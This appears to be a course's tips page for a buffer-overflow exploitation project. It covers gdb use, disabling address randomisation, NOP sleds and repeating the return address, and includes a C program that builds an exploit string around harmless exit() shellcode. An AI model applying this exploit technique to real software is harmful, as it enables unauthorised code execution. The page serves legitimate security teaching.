Several Tips on Project 1

Several Tips on Project 1
Be sure to use the Makefile to generate the executables of both the exploit program and the target program.
Be sure to put "setarch i686 -R" in front of every execution, including both gdb and ./exploit. The -R flag disables address-space layout randomization, so the stack addresses you observe under gdb stay valid when the exploit runs.
You can use "x/b address" under gdb to see the byte stored at the specified address. This is helpful for determining whether memory is big-endian or little-endian, and therefore in which byte order to write the overwritten return address.
You can use "break foo" to set a breakpoint upon entering the foo() function.
Fill the shell executable code (in the string array shellcode[ ]) byte by byte into the buffer, so that your modified return address has code to jump to.
The deadline will not be changed, but the penalty for a submission up to one week late is now 10% off.

NOPs Most CPUs have a No-Operation instruction: it does nothing but advance the instruction pointer. Usually we can put a bunch of these ahead of our program (in the string). As long as the new return address points to any NOP in that run, execution slides down through the remaining NOPs into our code, so the guess does not have to be exact. This matters because the stack address of the buffer can shift by a few bytes between a run under gdb and a run from the shell (the environment differs), even with randomization disabled.

Figure: Using NOPs. The exploit string is laid out as a run of nop instructions, followed by the real program (exec /bin/ls or whatever), followed by the new return address. The new return address can point anywhere in the nop region.

Estimating the location of the return address We can also only guess at the location of the saved return address relative to the overflowed buffer. Rather than trying to hit that one slot exactly, put in a bunch of copies of the new return address so that one of them lands on it. The copies must be laid down at the same alignment as the slot (normally word-aligned relative to the buffer), or every copy straddles it.

Figure: Estimating the Location. The exploit string is laid out as a run of nop instructions, followed by the real program, followed by many consecutive copies of the new return address, so that one of them overwrites the saved return address wherever it sits.
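The three ideas above (write the return address in the byte order the CPU expects, lead the shellcode with a NOP sled, and repeat the return address so one copy hits the saved slot) combine into one exploit-string builder. The following is an added example, not the course's Project 1 code or Makefile: it assumes a 32-bit x86 target (4-byte little-endian return address, as after "setarch i686 -R") and that the saved return address sits at a word-aligned offset from the start of the overflowed buffer. The shellcode bytes are a stand-in for the project's shellcode[] (a 5-byte exit() system call, harmless), and the buffer sizes and the stack address 0xbffff5a0 are made up for the demonstration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NOP 0x90 /* x86 one-byte no-operation */

/* Write a 32-bit value in little-endian byte order, the order in which a
 * 32-bit x86 CPU reads a return address off the stack: lowest byte at the
 * lowest address, which is what "x/b" in gdb shows first. */
static void put_le32(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char)(v & 0xff);
    p[1] = (unsigned char)((v >> 8) & 0xff);
    p[2] = (unsigned char)((v >> 16) & 0xff);
    p[3] = (unsigned char)((v >> 24) & 0xff);
}

/* The same check the "x/b" tip performs in gdb, done in code: store a
 * known 32-bit value and look at its lowest-addressed byte. */
int host_is_little_endian(void)
{
    uint32_t probe = 0x11223344u;
    unsigned char lowest;
    memcpy(&lowest, &probe, 1);
    return lowest == 0x44;
}

/* Lay out an exploit string of exactly `len` bytes:
 *
 *   offset 0         addr_start                            len
 *   [ NOP sled ... ][ shellcode ][ ret ][ ret ][ ret ] ...  ]
 *
 * The shellcode ends at addr_start, and from addr_start on the string is
 * filled with copies of ret_addr. addr_start must be a multiple of 4: if
 * the saved return address sits at a word-aligned offset from the start
 * of the buffer (assumed here), one copy then lines up with it exactly.
 * ret_addr only needs to land somewhere in the sled. Returns len on
 * success, 0 if the pieces do not fit. */
size_t build_exploit(unsigned char *out, size_t len,
                     const unsigned char *shellcode, size_t sc_len,
                     size_t addr_start, uint32_t ret_addr)
{
    size_t sled_len, i;

    if (addr_start % 4 != 0 || addr_start <= sc_len || addr_start + 4 > len)
        return 0;
    sled_len = addr_start - sc_len;          /* at least one NOP */
    memset(out, NOP, sled_len);
    memcpy(out + sled_len, shellcode, sc_len);
    for (i = addr_start; i + 4 <= len; i += 4)
        put_le32(out + i, ret_addr);
    memset(out + i, NOP, len - i);           /* trailing partial word */
    return len;
}

/* The sled width is how wrong the guess of the buffer's address may be:
 * ret_addr must fall in [buf_addr, buf_addr + sled_len). */
int ret_lands_in_sled(uint32_t buf_addr, size_t sled_len, uint32_t ret_addr)
{
    return ret_addr >= buf_addr && ret_addr - buf_addr < sled_len;
}

/* Constructed demo inputs (not the project's values): a stand-in for the
 * project's shellcode[] that only calls exit() via int 0x80
 * (xor eax,eax; inc eax; int 0x80), and a made-up stack address. */
static const unsigned char demo_shellcode[] = { 0x31, 0xc0, 0x40, 0xcd, 0x80 };
#define DEMO_RET_ADDR 0xbffff5a0u
unsigned char demo_string[64];

/* 64-byte string: 27 NOPs, 5 bytes of shellcode, then 8 copies of the
 * return address starting at offset 32. */
size_t build_demo(void)
{
    return build_exploit(demo_string, sizeof demo_string,
                         demo_shellcode, sizeof demo_shellcode,
                         32, DEMO_RET_ADDR);
}

int main(void)
{
    size_t n = build_demo(), i;

    printf("host is %s-endian\n", host_is_little_endian() ? "little" : "big");
    for (i = 0; i < n; i++)
        printf("%02x%c", demo_string[i], (i % 16 == 15) ? '\n' : ' ');
    return 0;
}
```

In the dump the address shows up as "a0 f5 ff bf", the reverse of how it is written, which is exactly what "x/b" on the saved return address slot should show once the overflow has happened. If ret_lands_in_sled() says the chosen address misses, widen the sled (move addr_start up) rather than guessing the address more precisely.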